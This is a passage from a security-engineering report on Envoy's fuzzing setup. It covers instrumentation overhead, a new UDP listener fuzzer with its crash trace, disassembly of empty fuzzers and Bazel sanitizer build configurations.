~300,000\n(\nhttps://console.cloud.google.com/storage/browser/_details/envoy-logs.clusterfuzz-external.a\nppspot.com/libFuzzer_envoy_h2_capture_persistent_fuzz_test/libfuzzer_asan_envoy/2021-\n04-16/01:54:36:943426.log\n). This decrease in inline\n8-bit counters resulted in a 3x\nimprovement of the fuzzer execution. We note here\nthat in addition to the decrease in inline\n8-bit counters the stability of the fuzzer was also\nimproved on the same day through bug\nfixing, which may have impacted the performance as\nwell.\nAda Logics\nLondon, United Kingdom\n15\nEnvoy fuzzing improvements\n,\nApril 2021\n2 Fuzzing the Envoy UdpListener\nThe second task of the Engagement was to create a\nnew fuzzer that targets the UDP\nlistener of Envoy. The goal of this fuzzer was to\nenable catching the bug described in this\nGithub issue\nhttps://github.com/envoyproxy/envoy/issues/14113\n.\nThe fuzzer we created was\nmerged into Envoy and is available at this location\nin the repository:\nhttps://github.com/envoyproxy/envoy/blob/main/test/common/network/udp_fuzz.cc\nThe goal of the fuzzer is to send an arbitrary number\nof arbitrary packets to the Envoy UDP\nlistener. To do this we rely on the primitives provided\nbyNetwork::Test::UdpSyncPeer\nand\nthe core of the fuzzer is encapsulated by the following\nloop\n(\nhttps://github.com/envoyproxy/envoy/blob/58a13570f3f4dea9bad8b8fa5e1221d7ed5056de/t\nest/common/network/udp_fuzz.cc#L92\n):\n// Now do all of the fuzzingstaticconstintMaxPackets =15;total_packets_ = provider.ConsumeIntegralInRange<uint16_t>(1,MaxPackets);Network::Test::UdpSyncPeerclient_(ip_version_);for(uint16_ti =0; i < total_packets_; i++){std::stringpacket_ =provider.ConsumeBytesAsString(provider.ConsumeIntegralInRange<uint32_t>(1,3000));if(packet_.empty()) {packet_ =\"EMPTY_PACKET\";}client_.write(packet_, *send_to_addr_);}dispatcher_->run(Event::Dispatcher::RunType::Block);\nThe fuzzer supports communicating by way ofGRO\n,MMSG\nas well as regularrecvmsg\n, which\nis controlled by the following code\n(\nhttps://github.com/envoyproxy/envoy/blob/58a13570f3f4dea9bad8b8fa5e1221d7ed5056de/t\nest/common/network/udp_fuzz.cc#L73\n):\nFuzzedDataProviderprovider(buf, len);uint16_tSocketType = provider.ConsumeIntegralInRange<uint16_t>(0,2);if(SocketType ==0) {config.mutable_prefer_gro()->set_value(true);ON_CALL(override_syscall_, supportsUdpGro()).WillByDefault(Return(true));}elseif(SocketType ==1) {ON_CALL(override_syscall_, supportsMmsg()).WillByDefault(Return(true));}else{ON_CALL(override_syscall_, supportsMmsg()).WillByDefault(Return(false));ON_CALL(override_syscall_, supportsUdpGro()).WillByDefault(Return(false));}\nIn order to verify the fuzzer finds the original crash\nof the code we ran the fuzzer\nAda Logics\nLondon, United Kingdom\n16\nEnvoy fuzzing improvements\n,\nApril 2021\nagainst the Envoy codebase with the changes applied by the commit that fixed the\nUDP bug (\nhttps://github.com/envoyproxy/envoy/pull/14122/files\n).\nMore specifically,\nif we avoid the use of the condition\nif(output.msg_[i].truncated_and_dropped_) {continue;}\nin this commit\nhttps://github.com/envoyproxy/envoy/pull/14122/files#diff-c9702469f313c70572e261f4af736\n87873ab8247264eb47fd05300098067c5abR632\nthen we get\nthe following result:\n$ /out/udp_fuzz ./seeds/INFO: Running with entropic power schedule (0xFF,100).INFO: Seed: 185475315INFO: Loaded 1 modules (1087563 inline 8-bit counters):1087563 [0x861fcb0,0x87294fb),INFO: Loaded 1 PC tables (1087563 PCs): 1087563 [0x8729500,0x97c19b0),INFO: 55 files foundin./seeds/INFO: -max_len is not provided; libFuzzer will notgenerate inputs larger than 4096bytesINFO: seed corpus: files: 55 min: 1b max: 2251b total:4519b rss: 150MbAddressSanitizer:DEADLYSIGNAL===================================================================28367==ERROR: AddressSanitizer: SEGV on unknownaddress 0x000000000000 (pc0x000005872691 bp 0x7fff415ade70 sp 0x7fff415ad980T0)==28367==The signal is caused by a READ memory access.==28367==Hint: address points to the zero page.#0 0x5872691 in Envoy::Network::passPayloadToProcessor(unsignedlong,std::__1::unique_ptr<Envoy::Buffer::Instance,std::__1::default_delete<Envoy::Buffer::Instance>>,std::__1::shared_ptr<Envoy::Network::Address::Instanceconst>,std::__1::shared_ptr<Envoy::Network::Address::Instanceconst>,Envoy::Network::UdpPacketProcessor&,std::__1::chrono::time_point<std::__1::chrono::steady_clock,std::__1::chrono::duration<long long, std::__1::ratio<1l,1000000000l> > >)/proc/self/cwd/source/common/network/utility.cc:562:3#1 0x587501e in Envoy::Network::Utility::readFromSocket(Envoy::Network::IoHandle&,Envoy::Network::Address::Instance const&, Envoy::Network::UdpPacketProcessor&,std::__1::chrono::time_point<std::__1::chrono::steady_clock,std::__1::chrono::duration<long long, std::__1::ratio<1l,1000000000l> > >, bool,unsigned int*) /proc/self/cwd/source/common/network/utility.cc:669:7#2 0x5877d3a inEnvoy::Network::Utility::readPacketsFromSocket(Envoy::Network::IoHandle&,Envoy::Network::Address::Instance const&, Envoy::Network::UdpPacketProcessor&,Envoy::TimeSource&, bool, unsigned int&)/proc/self/cwd/source/common/network/utility.cc:702:38#3 0x552b14d in Envoy::Network::UdpListenerImpl::handleReadCallback()/proc/self/cwd/source/common/network/udp_listener_impl.cc:75:34#4 0x552a15f in Envoy::Network::UdpListenerImpl::onSocketEvent(short)/proc/self/cwd/source/common/network/udp_listener_impl.cc:64:5\nAda Logics\nLondon, United Kingdom\n17\nEnvoy fuzzing improvements\n,\nApril 2021\n#5 0x5531e26 inEnvoy::Network::UdpListenerImpl::UdpListenerImpl(Envoy::Event::DispatcherImpl&,std::__1::shared_ptr<Envoy::Network::Socket>, Envoy::Network::UdpListenerCallbacks&,Envoy::TimeSource&, envoy::config::core::v3::UdpSocketConfigconst&)::$_0::operator()(unsigned int) const/proc/self/cwd/source/common/network/udp_listener_impl.cc:38:53\n…\n.\n…\n.\nTo confirm the fuzzer targets the code that was asked\nfor by the Envoy team we observe\ncoverage of the fuzzer in OSS-Fuzz. Consider the following\nlinks showing the UDP Listener\ncode is being analysed:\n●Envoy::Network::UdpListenerImpl::handleReadCallback\nhttps://storage.googleapis.com/oss-fuzz-coverage/envoy/report\ns/20210423/linux/proc/self/cwd/source/common/network/udp_list\nener_impl.cc.html#L72\n●Envoy::Network::Utility::readFromSocket\nhttps://storage.googleapis.com/oss-fuzz-coverage/envoy/reports/20210423/linux/proc\n/self/cwd/source/common/network/utility.cc.html#L576\nIn addition to this, consider the figures in Appendix\nA.2 showing the coverage is being\nachieved.\n3 Future advice\nWe consider there to be three problems that need solving\nfor the Envoy team.\nFirst\n, enable the ability to disable instrumentation\nof protobuf code included in header files,\nwhich in themselves can have a huge amount of code.\nThis is because a lot of protobuf code\nis included by way of header files in the Envoy source\ncode:\nenvoy/source/common$ grep -rn\"pb.h\"./ | wc -l388\nThe unfortunate consequence of this is that the code\nin the header file could avoid being\ninstrumented but because it is included by important\ncode that has to be instrumented, the\nprotobuf code consequently will also be instrumented.\nSome refactoring that makes it easy\nto control the instrumentation parameters of the protobuf\ncode would likely have a large\nimpact on the execution speed.\nAn option for solving the protobuf problems above\nis to disable instrumentation on a\nnamespace or function level. We can do this by performing\npartial instrumentation with\nSanitizerCoverage\nas described here:\nhttps://clang.llvm.org/docs/SanitizerCoverage.html#partially-disabling-instrumentation\nAda Logics\nLondon, United Kingdom\n18\nEnvoy fuzzing improvements\n,\nApril 2021\nSpecifically, consider the file\nb l o c k _ l i s t . t x t\nwith the following contents:\nfun:*nocoveragepls*\nThis will disable coverage instrumentation for any\nfunction that containsnocoveragepls\nin\nits function name, which includes the namespace name.\nAs such, a way to disable\ninstrumentation in a smart manner is to include a\nfile\nb l o c k e d _ l i s t . t x t\nin the Envoy repository,\nwhich we will then use during Envoy fuzzing compilation\nas follows:--per_file_copt=\"-fsanitize-coverage-blocklist=envoy_code/block_list.txt\"\nWe did an initial experimentation of this by way of\nconfiguration #6 discussed in section\n1.3.2.\nSecond\n, add the ability to do per-target instrumentation.\nIt is clear that the fuzz targets in the\nEnvoy code target separate parts of the code base.\nIdeally instrumentation should be made\non a target-specific basis. The goal should be to\nhave less than 100,000 inline 8-bit counters\nper fuzzer. Notice that the number of counters is\nshown in the libFuzzer logs (as shown\nabove section 1.2.1) which are also available on OSS-Fuzz\nfor each of the OSS-Fuzz runs.\nWe leave the following instrumentation-specific advice:\n●\nIt can be beneficial to reduce coverage instrumentation\nalso from a perspective of\nletting the fuzzer focus on code that matters, since\nthe fuzzer will be guided by\nimprovements in relevant code and not get “lost” in\nirrelevant code.\n●\nLarge chunks of sequential code does not need to be\ninstrumented with coverage,\nincluding Envoy critical code. We advise to keep bug-finding\nsanitizers on\nnonetheless.\nThird\n, during the engagement we observed that several\nof the fuzzers had a high crashing\npercentage (above 90%) for several months. In fact,\nthe http2 end-to-end fuzzer had an\ninput in its corpus that caused the fuzzer to crash.\nEffectively, the fuzzer had not explored\nnew code for months because this input blocked the\nfuzzer from continuing. We think it is\ncrucial for the Envoy team to ensure the fuzzers of\nEnvoy are running properly and this\nshould be considered higher priority than ensuring\nthe fuzzers run fast.\n4 Conclusions\nIn this engagement we improved Envoy fuzzing by identifying\nthe performance bottleneck in\nthe Envoy fuzzing set up and creating a new UDP fuzzer\nthat targets previously buggy code.\nOur findings identify that the performance bottleneck\nin Envoy is due to large amounts of\ncode instrumentation which causes LibFuzzer to spend\nsignificant effort in determining if\neach fuzz iteration caused new code to execute. We\nshow how this affects the Envoy\nfuzzers, for example by highlighting an empty fuzzer\nruns 419 times slower with Envoy’s\ninstrumentation approach. We show how to limit the\namount of instrumentation in Envoy and\nhow it improves performance.\nAda Logics\nLondon, United Kingdom\n19\nEnvoy fuzzing improvements\n,\nApril 2021\n5 Appendix\nA.0 Disassembly of empty fuzzers\nAppendix showing the disassembly of\nL L V M F u z z e r T e s t O n e I n p u t\nin the two empty fuzzers is\nsimilar.\nDisassembly of\nh2_empty_fuzz_test\n, namely the empty\nfuzzer compiled with Envoy\ninstrumentation.\n$ gdb /out/h2_empty_fuzz_testReading symbols from /out/h2_empty_fuzz_test...done.(gdb)setdisassembly-flavor intel(gdb) disass LLVMFuzzerTestOneInputDump of assembler codeforfunctionLLVMFuzzerTestOneInput:0x0000000003235e90 <+0>: push rbp0x0000000003235e91 <+1>: mov rbp,rsp0x0000000003235e94 <+4>: add BYTE PTR [rip+0x72d9dfc],0x1# 0xa50fc970x0000000003235e9b <+11>: mov rax,0xffffffffffffedc80x0000000003235ea2 <+18>: cmp rbp,QWORD PTRfs:[rax]0x0000000003235ea6 <+22>: jae 0x3235eac <LLVMFuzzerTestOneInput+28>0x0000000003235ea8 <+24>: mov QWORD PTR fs:[rax],rbp0x0000000003235eac <+28>: call 0x3235ec0 <_ZL17EnvoyTestOneInputPKhm>0x0000000003235eb1 <+33>: xor eax,eax0x0000000003235eb3 <+35>: pop rbp0x0000000003235eb4 <+36>: retEnd of assembler dump.(gdb) disass _ZL17EnvoyTestOneInputPKhmDump of assembler codeforfunction_ZL17EnvoyTestOneInputPKhm:0x0000000003235ec0 <+0>: push rbp0x0000000003235ec1 <+1>: mov rbp,rsp0x0000000003235ec4 <+4>: push r140x0000000003235ec6 <+6>: push rbx0x0000000003235ec7 <+7>: add BYTE PTR [rip+0x72d9dca],0x1# 0xa50fc980x0000000003235ece <+14>: mov rbx,rsi0x0000000003235ed1 <+17>: mov r14,rdi0x0000000003235ed4 <+20>: mov rax,0xffffffffffffedc80x0000000003235edb <+27>: cmp rbp,QWORD PTRfs:[rax]0x0000000003235edf <+31>: jae 0x3235ee5 <_ZL17EnvoyTestOneInputPKhm+37>0x0000000003235ee1 <+33>: mov QWORD PTR fs:[rax],rbp0x0000000003235ee5 <+37>: mov edi,0x498f3a940x0000000003235eea <+42>: mov rsi,rbx0x0000000003235eed <+45>: call 0x3153860 <__sanitizer_cov_trace_const_cmp8()>0x0000000003235ef2 <+50>: cmp rbx,0x498f3a940x0000000003235ef9 <+57>: jne 0x3235f31 <_ZL17EnvoyTestOneInputPKhm+113>0x0000000003235efb <+59>: add BYTE PTR [rip+0x72d9d98],0x1# 0xa50fc9a0x0000000003235f02 <+66>: lea rdi,[rip+0x908047f]# 0xc2b6388 <_ZNSt3__14coutE>0x0000000003235f09 <+73>: lea rsi,[rip+0xfffffffffd3ba150]# 0x5f0060 <.str.4>0x0000000003235f10 <+80>: call 0x3235f40<_ZNSt3__1lsINS_11char_traitsIcEEEERNS_13basic_ostreamIcT_EES6_PKc>0x0000000003235f15 <+85>: mov rdi,rax0x0000000003235f18 <+88>: mov rsi,r140x0000000003235f1b <+91>: call 0x3235f80<_ZNSt3__1lsINS_11char_traitsIcEEEERNS_13basic_ostreamIcT_EES6_PKh>0x0000000003235f20 <+96>: lea rsi,[rip+0xfffffffffd3ba179]# 0x5f00a0 <.str.5>0x0000000003235f27 <+103>: mov rdi,rax0x0000000003235f2a <+106>: call 0x3235f40<_ZNSt3__1lsINS_11char_traitsIcEEEERNS_13basic_ostreamIcT_EES6_PKc>\nAda Logics\nLondon, United Kingdom\n20\nEnvoy fuzzing improvements\n,\nApril 2021\n0x0000000003235f2f <+111>: jmp 0x3235f38 <_ZL17EnvoyTestOneInputPKhm+120>0x0000000003235f31 <+113>: add BYTE PTR [rip+0x72d9d61],0x1# 0xa50fc990x0000000003235f38 <+120>: pop rbx0x0000000003235f39 <+121>: pop r140x0000000003235f3b <+123>: pop rbp0x0000000003235f3c <+124>: retEnd of assembler dump.(gdb)\nDisassembly of empty fuzz test compiled without instrumentation:\n# gdb -q ./a.outReading symbols from ./a.out...done.(gdb)setdisassembly-flavor intel(gdb) disass LLVMFuzzerTestOneInputDump of assembler codeforfunctionLLVMFuzzerTestOneInput:0x0000000000557d40 <+0>: push rbp0x0000000000557d41 <+1>: mov rbp,rsp0x0000000000557d44 <+4>: add BYTE PTR [rip+0x2f43ad],0x1# 0x84c0f80x0000000000557d4b <+11>: mov rax,QWORD PTR[rip+0x2f1246]# 0x848f980x0000000000557d52 <+18>: cmp rbp,QWORD PTRfs:[rax]0x0000000000557d56 <+22>: jae 0x557d5c <LLVMFuzzerTestOneInput+28>0x0000000000557d58 <+24>: mov QWORD PTR fs:[rax],rbp0x0000000000557d5c <+28>: call 0x557d70 <_ZL17EnvoyTestOneInputPKhm>0x0000000000557d61 <+33>: xor eax,eax0x0000000000557d63 <+35>: pop rbp0x0000000000557d64 <+36>: retEnd of assembler dump.(gdb) disass _ZL17EnvoyTestOneInputPKhmDump of assembler codeforfunction_ZL17EnvoyTestOneInputPKhm:0x0000000000557d70 <+0>: push rbp0x0000000000557d71 <+1>: mov rbp,rsp0x0000000000557d74 <+4>: push r140x0000000000557d76 <+6>: push rbx0x0000000000557d77 <+7>: add BYTE PTR [rip+0x2f437b],0x1# 0x84c0f90x0000000000557d7e <+14>: mov rbx,rsi0x0000000000557d81 <+17>: mov r14,rdi0x0000000000557d84 <+20>: mov rax,QWORD PTR[rip+0x2f120d]# 0x848f980x0000000000557d8b <+27>: cmp rbp,QWORD PTRfs:[rax]0x0000000000557d8f <+31>: jae 0x557d95 <_ZL17EnvoyTestOneInputPKhm+37>0x0000000000557d91 <+33>: mov QWORD PTR fs:[rax],rbp0x0000000000557d95 <+37>: mov edi,0x498f3a940x0000000000557d9a <+42>: mov rsi,rbx0x0000000000557d9d <+45>: call 0x473370 <__sanitizer_cov_trace_const_cmp8()>0x0000000000557da2 <+50>: cmp rbx,0x498f3a940x0000000000557da9 <+57>: jne 0x557ddb <_ZL17EnvoyTestOneInputPKhm+107>0x0000000000557dab <+59>: add BYTE PTR [rip+0x2f4349],0x1# 0x84c0fb0x0000000000557db2 <+66>: mov edi,0x11a77e00x0000000000557db7 <+71>: mov esi,0x5e03a00x0000000000557dbc <+76>: call 0x557df0<_ZNSt3__1lsINS_11char_traitsIcEEEERNS_13basic_ostreamIcT_EES6_PKc>0x0000000000557dc1 <+81>: mov rdi,rax0x0000000000557dc4 <+84>: mov rsi,r140x0000000000557dc7 <+87>: call 0x557e30<_ZNSt3__1lsINS_11char_traitsIcEEEERNS_13basic_ostreamIcT_EES6_PKh>0x0000000000557dcc <+92>: mov esi,0x5e03e00x0000000000557dd1 <+97>: mov rdi,rax0x0000000000557dd4 <+100>: call 0x557df0\nAda Logics\nLondon, United Kingdom\n21\nEnvoy fuzzing improvements\n,\nApril 2021\n<_ZNSt3__1lsINS_11char_traitsIcEEEERNS_13basic_ostreamIcT_EES6_PKc>0x0000000000557dd9 <+105>: jmp 0x557de2 <_ZL17EnvoyTestOneInputPKhm+114>0x0000000000557ddb <+107>: add BYTE PTR [rip+0x2f4318],0x1# 0x84c0fa0x0000000000557de2 <+114>: pop rbx0x0000000000557de3 <+115>: pop r140x0000000000557de5 <+117>: pop rbp0x0000000000557de6 <+118>: retEnd of assembler dump.\nA.1 Build configurations\nConfiguration 1. Regular build\nThis is simply a regular build.\nConfiguration 2.\nThis configuration disables:\n●\nCoverage and bug-finding sanitizers in many of the\nexternal libraries\n●\nCoverage instrumentation of various folders under\nsource/common and\nsource/extensions\n●\nCoverage instrumentation of code in test/ directory.\n●\nCoverage instrumentation of all .pb.cc files and all\n(.cc) files in the bazel-out directory\ndeclare -r DI=\"$(if [ \"$SANITIZER\" != \"coverage\" ]then# Envoy code. Disable coverage instrumentationecho \" --per_file_copt=^.*source/extensions/access_loggers/.*\\.cc\\$@-fsanitize-coverage=0\"echo \" --per_file_copt=^.*source/extensions/filters/.*\\.cc\\$@-fsanitize-coverage=0\"echo \" --per_file_copt=^.*source/extensions/.*\\.cc\\$@-fsanitize-coverage=0\"echo \" --per_file_copt=^.*source/common/protobuf/.*\\.cc\\$@-fsanitize-coverage=0\"echo \" --per_file_copt=^.*source/common/network.*\\.cc\\$@-fsanitize-coverage=0\"echo \" --per_file_copt=^.*source/common/runtime.*\\.cc\\$@-fsanitize-coverage=0\"\n# Envoy test code. Disable coverage instrumentationecho \" --per_file_copt=^.*test/.*\\.cc\\$@-fsanitize-coverage=0\"\n# Disable external libraries.echo \" --per_file_copt=^.*antlr4_runtimes.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_alibaba_hessian2_codec.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*io_opencensus_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_protobuf.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_absl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*googletest.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_googlesource_code_re2.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*upb.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_jbeder_yaml_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*proxy_wasm_cpp_host/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_google_libprotobuf_mutator/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\nAda Logics\nLondon, United Kingdom\n22\nEnvoy fuzzing improvements\n,\nApril 2021\necho \" --per_file_copt=^.*com_googlesource_googleurl/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_datadog_dd_opentracing_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\n# All protobuf code and code in bazel-outecho \" --per_file_copt=^.*\\.pb\\.cc\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*bazel-out/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"fi)\"\nConfiguration 3.\nThis configuration disables everything that configuration\n2 disables\nexcept\n:\n●\nCode under source/common and source/extensions.\ndeclare -r DI=\"$(if [ \"$SANITIZER\" != \"coverage\" ]then# Envoy code. Disable coverage instrumentation\n# Envoy test code. Disable coverage instrumentationecho \" --per_file_copt=^.*test/.*\\.cc\\$@-fsanitize-coverage=0\"\n# Disable celcpp and grpc correctly.echo \" --per_file_copt=^.*antlr4_runtimes.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_alibaba_hessian2_codec.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*io_opencensus_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_protobuf.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_absl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*googletest.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_googlesource_code_re2.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*upb.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_jbeder_yaml_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*proxy_wasm_cpp_host/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_google_libprotobuf_mutator/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_googlesource_googleurl/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_datadog_dd_opentracing_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_envoyproxy_sqlparser.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*grpc_httpjson_transcoding.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*grpc_httpjson_transcoding.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\n# All protobuf code and code in bazel-outecho \" --per_file_copt=^.*\\.pb\\.cc\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*bazel-out/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"fi)\"\nConfiguration 4\nThis configuration disables everything that configuration\n3 disables\nand also\n:\n●\nDisabling bug-finding instrumentation in files under\nthe test/ directory.\nAda Logics\nLondon, United Kingdom\n23\nEnvoy fuzzing improvements\n,\nApril 2021\ndeclare -r DI=\"$(if [ \"$SANITIZER\" != \"coverage\" ]then# Envoy code. Disable coverage instrumentation\n# Envoy test code. Disable coverage instrumentationecho \" --per_file_copt=^.*test/.*\\.cc\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\n# Disable celcpp and grpc correctly.echo \" --per_file_copt=^.*antlr4_runtimes.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_alibaba_hessian2_codec.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*io_opencensus_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_protobuf.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_absl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*googletest.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_googlesource_code_re2.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*upb.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_jbeder_yaml_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*proxy_wasm_cpp_host/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_google_libprotobuf_mutator/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_googlesource_googleurl/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_datadog_dd_opentracing_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_envoyproxy_sqlparser.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*grpc_httpjson_transcoding.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*grpc_httpjson_transcoding.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\n# All protobuf code and code in bazel-outecho \" --per_file_copt=^.*\\.pb\\.cc\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*bazel-out/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"fi)\"\nConfiguration 5\nThis configuration disables everything that configuration\n4 disables\nand also\n:\n●\nDisabling coverage instrumentation of all .cc files\nin source/server folder.\ndeclare-r DI=\"$(if [ \"$SANITIZER\" != \"coverage\" ]then# Envoy code. Disable coverage instrumentationecho \" --per_file_copt=^.*source/server.*\\.cc\\$@-fsanitize-coverage=0\"# Envoy test code. Disable coverage instrumentationecho \" --per_file_copt=^.*test/.*\\.cc\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\n# Disable celcpp and grpc correctly.echo \" --per_file_copt=^.*antlr4_runtimes.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_alibaba_hessian2_codec.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*io_opencensus_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_protobuf.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_absl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*googletest.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\nAda Logics\nLondon, United 